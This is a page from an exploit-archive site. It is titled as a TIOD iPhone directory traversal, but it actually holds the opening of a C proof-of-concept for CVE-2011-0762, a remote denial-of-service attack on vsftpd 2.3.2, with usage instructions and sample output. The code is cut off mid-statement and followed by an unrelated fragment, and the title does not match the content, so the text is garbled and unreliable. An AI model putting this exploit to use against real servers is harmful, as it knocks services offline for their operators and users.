ExploitFixes
TIOD v1.3.3 for iPhone / iPod touch Directory Traversal 2011-03-03 09:15:11

#include
#include
#include
#include
#include
#include
#include

/*
This is code of
http://cxib.net/stuff/vspoc232.c

PoC CVE-2011-0762 ( vsftpd )
Remote Denial of Service

Affected: 2.3.2
Fix: 2.3.4

Author:
Maksymilian Arciemowicz

Use:
./vspoc232 127.0.0.1 21 user pass 1

or read
http://securityreason.com/achievement_securityalert/95
for more information

Example result:
[email protected]:~$ telnet 172.5.0.129 21
Trying 172.5.0.129...
Connected to 172.5.0.129.
Escape character is '^]'.
500 OOPS: fork
Connection closed by foreign host.

*/

int skip=0;

int sendftp(int stream,char *what){
if(-1==send(stream,what,strlen(what),0))
printf("Can't send %s\n",what);
else
printf("send: %s\n",what);

bzero(what,sizeof(what));
}

void readftp(int stream){
char readline[4096];
if(recv(stream,readline,4096,0)
OVER HACKER 03.03.2011


In order to submit a new fix you need to be registered.